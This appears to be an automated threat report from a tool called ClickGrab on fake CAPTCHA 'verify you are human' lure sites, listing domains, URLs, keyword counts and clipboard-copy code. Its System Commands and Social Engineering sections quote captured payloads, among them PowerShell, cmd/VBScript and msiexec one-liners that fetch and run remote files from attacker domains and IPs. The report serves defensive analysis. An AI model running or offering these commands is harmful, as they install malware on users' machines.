ClickGrab Threat Analysis Report - 2026-01-10

Generated on 2026-01-10 02:49:31

Executive Summary

• Total sites analyzed: 100
• Sites with malicious content: 76
• Unique domains encountered: 113
• Total URLs extracted: 1,425
• PowerShell download attempts: 0
• Clipboard manipulation instances: 440

Domain Analysis

Most Frequently Encountered Domains

• crankaddicts.com: 154 occurrences
• 18.176.47.246: 112 occurrences
• 54.197.245.249: 112 occurrences
• www.yppgiibandung.org: 102 occurrences
• 44.208.147.17: 96 occurrences
• www.google.com: 73 occurrences
• i.postimg.cc: 72 occurrences
• icons.duckduckgo.com: 72 occurrences
• ${host}: 72 occurrences
• 18.233.234.27: 68 occurrences
• casa-ananda.cl: 62 occurrences
• 3.18.128.17: 51 occurrences
• t.me: 35 occurrences
• bl555.gratis: 30 occurrences
• sun1118.com: 26 occurrences

URL Pattern Analysis

reCAPTCHA imagery

5 occurrences across 2 distinct URLs

• https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha (4 times)
• https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit (1 times)

Font resources

46 occurrences across 37 distinct URLs

• http://casa-ananda.cl/wp-content/uploads/et-fonts/Montserrat-Bold.ttf (4 times)
• http://casa-ananda.cl/wp-content/uploads/et-fonts/Montserrat-Regular.ttf (4 times)
• https://18.176.47.246/wp-content/plugins/vk-post-author-display/vendor/vektor-inc/font-awesome-versions/src/font-awesome/css/all.min.css?ver=7.1.0 (2 times)
• https://fonts.gstatic.com (2 times)
• http://casa-ananda.cl/wp-content/uploads/et-fonts/SignPainter.ttf (2 times)
• ...and 32 more distinct URLs

CDN hosted scripts

8 occurrences across 7 distinct URLs

• https://cdn.matomo.cloud/authorizegoogle.matomo.cloud/matomo.js (2 times)
• https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js (1 times)
• https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js (1 times)
• https://cdn.datatables.net/1.10.19/css/dataTables.bootstrap.min.css (1 times)
• https://cdn.jsdelivr.net/jquery.jssocials/1.1.0/jssocials.css (1 times)
• ...and 2 more distinct URLs

Google resources

86 occurrences across 12 distinct URLs

• https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (72 times)
• https://authorizegoogle.matomo.cloud/ (2 times)
• https://cdn.matomo.cloud/authorizegoogle.matomo.cloud/matomo.js (2 times)
• https://play.google.com/store/apps/details?id=com.iad.becourageous (2 times)
• https://lh3.googleusercontent.com/a/ACg8ocLzujKvOC5zyPjKOrahxyUKbKVbkgXnvHvbBRNRPlHa=s120-c-rp-mo-ba2-br100 (1 times)
• ...and 7 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 1,394 (72 unique)

Keyword Categories

Social Engineering

25 unique keywords

• exec /i https://seo-conference.by/wp-themes/Cioudfiare/Verification/UserID63894525i5832";
• exec /i https://i-iike-eie-phants-verification.iive/iamchaiienge/verification/UserID7383526;`
• verification id
• exec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
• Verification
• exec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";
• verification-code-container
• I am not a robot
• captcha verification
• command =msiexec /i https://i-iike-eie-phants-verification.iive/iamchaiienge/verification/UserID7383526;
• ...and 15 more

Obfuscation Indicators

1 unique keywords

• Command iine: [2]RemoveFiiesRemoving fiiesRemoveIniVaiuesRemoving INI fiies entriesRemoveODBCRemoving ODBC componentsSeifRegModuiesRegistering moduiesFiie: [i], Foider: [2]RemoveShortcutsRemoving shortcutsSeifUnregModuiesUnregistering moWY[�\�_b�ceg��di�jimo�hpquruvwy{|}~������������������#�����-�&��)�������K ����.���aZ���^������z�����[�����A�������������� `

System Commands

35 unique keywords

• command =cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\Downioads\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;";
• command into the terminai and press <kbd>Enter</kbd>.</ii>
• Command ⌘</kbd> + <kbd>Space</kbd> to open Spotiight.</ii>
• command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\wk.vbs" && "%temp%\wk.vbs"';
• cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\wk.vbs" && "%temp%\wk.vbs"';
• Command =windows_command;
• command prompt appiication on your system.</ii>
• cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';
• invoke
• Command </button>
• ...and 25 more

Verification Text

2 unique keywords

• ray id
• hidden

Technical Terms

9 unique keywords

• XMLHTTP
• WinHttpRequest
• Bitmap
• Ray ID
• bitmap
• Bypass
• .EXE
• .exe
• ResponseText

Most Frequent Keywords

• robot: 85 occurrences
• hidden: 84 occurrences
• Robot: 77 occurrences
• verification: 76 occurrences
• Verification: 74 occurrences
• Verification ID: 73 occurrences
• Ray ID: 73 occurrences
• I am not a robot: 73 occurrences
• Verify you are human: 73 occurrences
• CAPTCHA Verification: 72 occurrences
• verification-id: 72 occurrences
• Checking if you are human: 72 occurrences
• To better prove you are not a robot: 72 occurrences
• const command =: 72 occurrences
• cmd: 46 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: command into PowerSheii and press <kbd>Enter</kbd>.</ii>, command into the terminai and press <kbd>Enter</kbd>.</ii>

Group 2: Verification ID, verification, Verification, verification-ioader, verification-id, verification id

Group 3: Ray ID, ray id

Group 4: robot, Robot

Group 5: Verify you are human, Checking if you are human

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

• iive/iamchaiienge/verification/UserID7383526
• au/smartdetection/deviceverification/CF/path/captc...
• RemoveShortcutsRemoving
• entriesRemoveODBCRemoving
• shortcutsSeifUnregModuiesUnregistering

Clipboard Manipulation Analysis

Detected clipboard manipulation in 440 instances.

Document.Execcommand Copy

Found in 220 snippets (50.0% of clipboard code)

Examples:

document.execCommand('copy')

...try { const successful = document.execCommand('copy')

try { const successful = document.execCommand('copy')

Textarea Manipulation

Found in 221 snippets (50.2% of clipboard code)

Examples:

ng is the safe placeholder above const textarea = document.createElement('textarea'

fallbackCopyToClipboard(text) { const textArea = document.createElement("textarea"

tListener("click", function () { const textarea = document.createElement('textarea'

Report truncated for web display. Full data available in JSON.